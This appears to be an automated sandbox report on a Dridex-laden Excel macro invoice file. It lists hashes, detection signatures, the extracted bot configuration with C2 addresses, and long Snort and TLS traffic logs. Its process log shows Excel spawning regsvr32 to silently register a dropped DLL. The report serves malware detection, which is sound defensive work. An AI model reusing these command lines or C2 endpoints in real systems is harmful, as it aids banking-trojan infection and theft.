Loading ...

Play interactive tourEdit tour

Analysis Report INV8222874744_20210111490395.xlsm

Overview

General Information

Sample Name:INV8222874744_20210111490395.xlsm
Analysis ID:338363
MD5:032734a3c93c44855955d4769b7ded98
SHA1:f38cd18659e0fb5d862bac1d9f24691dda4a292c
SHA256:1e66c639f157fa066c2e4070a46cb0af32548f4fba63684120513433059cd26d
Tags:Dridexxlsm

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Dridex
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Dridex e-Banking trojan
Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: BlueMashroom DLL Load
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Document contains an embedded VBA macro which may execute processes
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Machine Learning detection for dropped file
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Regsvr32 Anomaly
Adds / modifies Windows certificates
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to query network adapater information
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Drops PE files
Drops certificate files (DER)
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the installation date of Windows
Registers a DLL
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2288 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • regsvr32.exe (PID: 2548 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\bjcbglsw.dll. MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2540 cmdline: -s C:\Users\user\AppData\Local\Temp\bjcbglsw.dll. MD5: 432BE6CF7311062633459EEF6B242FB5)
    • DW20.EXE (PID: 2460 cmdline: 'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 2456 MD5: 45A078B2967E0797360A2D4434C41DB4)
      • DWWIN.EXE (PID: 2304 cmdline: C:\Windows\system32\dwwin.exe -x -s 2456 MD5: 25247E3C4E7A7A73BAEEA6C0008952B1)
  • cleanup

Malware Configuration

Threatname: Dridex

{"Config: ": ["--------------------------------------------------", "BOT ID", "--------------------------------------------------", "Bot id : 30341", "--------------------------------------------------", "IP Address table", "--------------------------------------------------", "Address count 8", "59.206.114.228:65153", "255.255.255.127:5491", "15.183.20.119:53893", "15.132.203.2:0", "70.129.254.255:65535", "127.114.235.190:65535", "255.127.104.242:15033", "162.104.101.15:41265"]}

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: BlueMashroom DLL LoadShow sources
Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\bjcbglsw.dll., CommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\bjcbglsw.dll., CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2288, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\bjcbglsw.dll., ProcessId: 2548
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\bjcbglsw.dll., CommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\bjcbglsw.dll., CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2288, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\bjcbglsw.dll., ProcessId: 2548
Sigma detected: Regsvr32 AnomalyShow sources
Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\bjcbglsw.dll., CommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\bjcbglsw.dll., CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2288, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\bjcbglsw.dll., ProcessId: 2548

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Found malware configurationShow sources
Source: 4.2.regsvr32.exe.3a0000.2.raw.unpackMalware Configuration Extractor: Dridex {"Config: ": ["--------------------------------------------------", "BOT ID", "--------------------------------------------------", "Bot id : 30341", "--------------------------------------------------", "IP Address table", "--------------------------------------------------", "Address count 8", "59.206.114.228:65153", "255.255.255.127:5491", "15.183.20.119:53893", "15.132.203.2:0", "70.129.254.255:65535", "127.114.235.190:65535", "255.127.104.242:15033", "162.104.101.15:41265"]}
Multi AV Scanner detection for submitted fileShow sources
Source: INV8222874744_20210111490395.xlsmReversingLabs: Detection: 42%
Machine Learning detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hhsz1e0[1].rarJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\bjcbglsw.dllJoe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknownHTTPS traffic detected: 217.174.149.3:443 -> 192.168.2.22:49167 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49170 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49174 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49178 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49182 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49186 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49190 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49194 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49198 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49202 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49206 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49210 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49214 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49218 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49222 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49226 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49232 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49236 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49240 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49244 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49248 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49252 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49256 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49260 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49264 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49268 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49272 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49276 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49280 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49284 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49288 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49292 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49296 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49300 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49304 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49308 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49312 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49316 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49320 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49324 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49328 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49332 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49336 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49340 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49344 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49348 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49352 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49356 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49360 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49364 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49368 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49372 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49376 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49380 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49384 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49388 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49392 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49396 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49400 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49404 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49408 version: TLS 1.2
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_003CCEF8 FindFirstFileExW,

Software Vulnerabilities:

barindex
Document exploit detected (creates forbidden files)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\bjcbglsw.dllJump to behavior
Document exploit detected (drops PE files)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: hhsz1e0[1].rar.0.drJump to dropped file
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
Source: global trafficDNS query: name: media-server.skyinternet.com.pk
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 217.174.149.3:443
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 217.174.149.3:443

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49170
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49171
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49172
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49172
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49174
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49175
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49176
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49176
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49178
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49179
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49180
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49180
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49182
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49183
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49184
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49184
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49186
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49187
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49188
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49188
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49190
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49191
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49192
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49192
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49194
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49195
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49196
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49196
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49198
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49199
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49200
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49200
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49202
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49203
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49204
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49204
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49206
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49207
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49208
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49208
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49210
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49211
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49212
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49212
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49214
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49215
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49216
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49216
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49218
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49219
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49220
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49220
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49222
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49223
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49224
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49224
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49226
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49228
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49229
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49229
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49232
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49233
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49234
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49234
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49236
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49237
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49238
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49238
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49240
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49241
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49242
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49242
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49244
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49245
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49246
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49246
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49248
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49249
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49250
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49250
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49252
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49253
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49254
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49254
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49256
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49257
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49258
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49258
